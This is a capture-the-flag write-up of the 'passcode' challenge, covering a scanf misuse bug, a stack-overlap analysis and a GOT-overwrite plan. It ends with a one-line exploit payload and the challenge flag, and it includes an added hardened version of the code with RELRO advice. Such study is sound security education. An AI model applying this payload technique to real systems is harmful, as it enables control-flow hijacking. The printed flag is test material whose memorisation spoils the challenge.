Toddler's Bottle - passcode
SCP the source and the executable first:

```
flora@kali:~/Downloads$ scp -P 2222 [email protected]:/home/passcode/passcode ./
[email protected]'s password:
passcode 100% 7485 45.2KB/s 00:00
flora@kali:~/Downloads$ scp -P 2222 [email protected]:/home/passcode/passcode.c ./
[email protected]'s password:
passcode.c 100% 858 6.0KB/s 00:00
```
Code:

```c
#include <stdio.h>
#include <stdlib.h>

void login(){
    int passcode1;   /* uninitialised: holds whatever was left on the stack */
    int passcode2;
    printf("enter passcode1 : ");
    scanf("%d", passcode1);   /* bug: passes the int's value, not &passcode1, as the store address */
    fflush(stdin);            /* undefined behaviour on an input stream in standard C */
    // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
    printf("enter passcode2 : ");
    scanf("%d", passcode2);   /* same bug */
    printf("checking...\n");
    if(passcode1==338150 && passcode2==13371337){
        printf("Login OK!\n");
        system("/bin/cat flag");
    }
    else{
        printf("Login Failed!\n");
        exit(0);
    }
}

void welcome(){
    char name[100];
    printf("enter you name : ");
    scanf("%100s", name);     /* reads up to 100 characters, then appends the NUL terminator */
    printf("Welcome %s!\n", name);
}

int main(){
    printf("Toddler's Secure Login System 1.0 beta.\n");
    welcome();
    login();
    // something after login...
    printf("Now I can safely trust you that you have credential :)\n");
    return 0;
}
```
Look at the code: scanf is used to read the passcodes, as `scanf("%d", passcode1);` and `scanf("%d", passcode2);`.

scanf: Reads data from stdin and stores them according to the parameter format into the locations pointed by the additional arguments. The additional arguments should point to already allocated objects of the type specified by their corresponding format specifier within the format string.

Note that passcode1 and passcode2 are integers, so the calls should be `scanf("%d", &passcode1);` and `scanf("%d", &passcode2);`. Without the "&", scanf treats the current value of the (uninitialised) integer as an address and writes the user input to the memory that address points to.
Variable addresses:

```
name:      [ebp-0x70]
passcode1: [ebp-0x10]
passcode2: [ebp-0xc]
```

Note this code: `char name[100]`. passcode1 and passcode2 are integers, each 4 bytes. Calculate the offset: passcode1 - name = 0x70 - 0x10 = 0x60 = 96 bytes. Because welcome() and login() are both called from main() with the same frame base, login()'s uninitialised passcode1 sits exactly where bytes 96..99 of the name array were written, so passcode1 occupies the last four bytes of the name array.
After the comparison `if(passcode1==338150 && passcode2==13371337)`, the system() function is called. To reach system() without the correct values, we can overwrite a function's entry in the Global Offset Table (GOT). Which functions are called before system()? printf() and fflush(). I chose the printf() entry to overwrite.
**credits: got and plt tables for pwning**
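As an added example (not part of this write-up or the challenge source), here is what login() looks like once the two missing "&" are fixed and the input is read with a bounded fgets() and parsed with strtol(): every write lands in a real local variable, both integers are initialised, and malformed input fails closed. The expected values are the ones from the challenge; the function and helper names (login_fixed, parse_int_line, parse_or_default, passcodes_match) are my own. Note also that gcc -Wall already catches the original call, warning that format '%d' expects argument of type 'int *' but argument 2 has type 'int'.

```c
/* Added example: hardened version of the challenge's login(), not the
 * original code. Helper names are hypothetical; expected passcodes are
 * the ones from passcode.c. */
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

#define EXPECTED_PASSCODE1 338150
#define EXPECTED_PASSCODE2 13371337

/* Parse exactly one decimal integer from a line of text.
 * Returns 1 on success and stores the value through the address `out`;
 * returns 0 for empty input, non-digit junk or out-of-range values. */
int parse_int_line(const char *line, int *out) {
    char *end = NULL;
    long v;
    if (line == NULL || out == NULL || *line == '\0') return 0;
    errno = 0;
    v = strtol(line, &end, 10);
    if (errno == ERANGE || v < INT_MIN || v > INT_MAX) return 0;
    if (end == line) return 0;                         /* no digits at all */
    while (*end == ' ' || *end == '\t' || *end == '\n' || *end == '\r') end++;
    if (*end != '\0') return 0;                        /* trailing junk */
    *out = (int)v;
    return 1;
}

/* Convenience wrapper: the parsed value, or `dflt` if the line is invalid. */
int parse_or_default(const char *line, int dflt) {
    int v = 0;
    return parse_int_line(line, &v) ? v : dflt;
}

/* Pure comparison, kept apart from I/O so it can be tested directly. */
int passcodes_match(int passcode1, int passcode2) {
    return passcode1 == EXPECTED_PASSCODE1 && passcode2 == EXPECTED_PASSCODE2;
}

/* Hardened login: bounded line reads plus explicit parsing instead of
 * scanf("%d", passcode1). Returns 1 for a correct pair, 0 otherwise;
 * the caller decides what to do with the result. */
int login_fixed(FILE *in) {
    char line[64];
    int passcode1 = 0, passcode2 = 0;   /* initialised: never stale stack data */

    printf("enter passcode1 : ");
    if (fgets(line, sizeof line, in) == NULL || !parse_int_line(line, &passcode1))
        return 0;                       /* note the '&': a real address */

    printf("enter passcode2 : ");
    if (fgets(line, sizeof line, in) == NULL || !parse_int_line(line, &passcode2))
        return 0;

    printf("checking...\n");
    return passcodes_match(passcode1, passcode2);
}

int main(void) {
    if (login_fixed(stdin)) {
        printf("Login OK!\n");
        return 0;
    }
    printf("Login Failed!\n");
    return 1;
}
```

Two further points for the defensive side. The GOT overwrite in this challenge works because the binary's GOT is writable at run time; linking with full RELRO (`-Wl,-z,relro,-z,now`) makes it read-only after loading, so a stray write there faults instead of redirecting printf(). And a line longer than the 64-byte buffer leaves its tail in the stream, which then fails the second parse, so over-long input simply fails the login rather than being silently truncated.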
Solution:

```
python -c "print ('A'*96+'\x00\xa0\x04\x08'+'134514147')" | ./passcode
```
Flag: Sorry mom.. I got confused about scanf usage :(